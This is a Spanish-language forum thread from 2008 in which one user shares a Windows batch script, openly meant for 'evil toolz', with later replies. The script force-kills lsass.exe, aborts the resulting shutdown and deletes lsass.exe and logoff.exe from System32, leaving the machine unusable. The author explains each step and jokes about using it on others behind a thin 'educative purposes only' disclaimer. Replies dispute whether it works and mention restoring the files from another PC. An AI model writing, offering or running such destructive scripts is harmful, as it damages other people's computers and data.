código de ataque a lsass en batch

Iniciado por corax, 25 Junio 2008, 14:21 PM

0 Miembros y 2 Visitantes están viendo este tema.

corax

Bueno como hacía mucho tiempo que no posteaba nada que no fueran peticiones de ayuda, he decidico compartir con la humanidad espe pequeño código mío que tan buenos ratos me ha hecho pasar:

* * educative purposes only, no me responsabilizo de que te jodas el ordenador * *

@echo off
taskkill /IM lsass.exe /f
shutdown -a
del /q /f %WINDIR%\System32\lsass.exe
del /q / f %WINDIR%\System32\logoff.exe
exit

* educative purposes only, no me responsabilizo de que jodas ordenadores ajenos *

Este código hará las delicias de los que mepiecen a programar sus "evil toolz" en batch, ya que puede usarse sólo o incorporado a un código mayor.
SI VAS A HACER ALGO GORDO EN BATCH NO SEAS MALA GENTE Y MÁNDALO A VIRUSTOTAL. INFECTAR POR INFECTAR Y HAER DAÑO POR HACER DAÑO ES TERRORISMO.

|------------------>

Y ahora, una breve explicación que probablemente nadie lea  :xD (ya he publicado el código, qué mas puede importar, pensarán algunos):

Lo primero que hace este código es parar el proceso lsass.exe. Para ello se vale del modificador /f, que indica carácter forzado (para el que no lo sepa, el lsass.exe es un proceso de sistema :¬¬).

Al abortar el proceso se inicia una cuenta atrás de 30 segundos para que se reinicie el ordenador. Para abortarla se utiliza el comando shutdown con el modificador -a.

¿Qué hemos conseguido con esto? Pues simple y llanamente que el ordenador no pueda apagarse si no es tirando del cable de la luz. ¿Divertido ehh?  :xD Pues procura que no te pase a ti, porque entonces verías lo divertido que es.

Entonces... ¿para qué valen los otros dos comandos? (dando por supuesto que se sabe para qué sirve el comando "exit"). Pues muy sencillo. Como además de traviesos somos malos, pero malos malos con ganas, pues no queremos que el ordenador pueda ser apagado nunca más.
Esos dos comandos hacen que el pequeño lío en el que has metido a la máquina no se solucione reiniciando. ¿Y cómo lo hace? Pues eliminando el archivo lsass.exe y el logoff.exe. Si no hay archivo, no hay proceso  :rolleyes: ;D

Sed buenos y no se lo hagáis a vuestra exnovia  :¬¬

Hasta otra!


Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

Crazy.sx

Mmm no se, pues no se puede matar tan facilmente el lsass.exe. Lo mismo con smss.exe, y otros mas.

Lo probé pero nada....
Destruir K. LOL

corax

El código está probado en una máquina corriendo bajo Windows XP Professional Edition con el SP2. Si lo estás probando en un sistema operativo similar, estás haciendo algo mal para no poder matar el lsass.exe. SI lo estás probando en otro distinto, por favor, notifícalo.
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

Fran_Al

No lo quiero probar, pero lo veo muy simple,,, nose.
¿Quien sabe?? lo mismo funciona
salu2 y gracias

corax

Cita de: corax en  5 Julio 2008, 13:49 PM
El código está probado en una máquina corriendo bajo Windows XP Professional Edition con el SP2.

Me parece que dejo claro que funciona, Francisquito.  :xD

Saludos!
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

Luzor

una pregunta,
despues de eliminar aquellos archivos existe una forma de "arreglar" ese problema??
se pueden recuperar esos archivos?aunque sean copiados y pegados desde otro pc?

leogtz

Si, una ves perdi unos archivos muy importantes, luego un amigo me los paso y todo que igual que antes :)

PD : El code no funciona, lo acabo de probar.
PD 2 : Esto va en Scripting.

Saludos.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

corax

En respuesta a tu post:

1. Ya sé que va en scripting... me di cuenta justo después de publicarlo  :xD
2. Dime en qué sistema operativo lo estás probando, porque en el mío funciona.

Am, y sí... la forma de arreglarlo es esa  ;) reubicando los archivos perdidos.
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.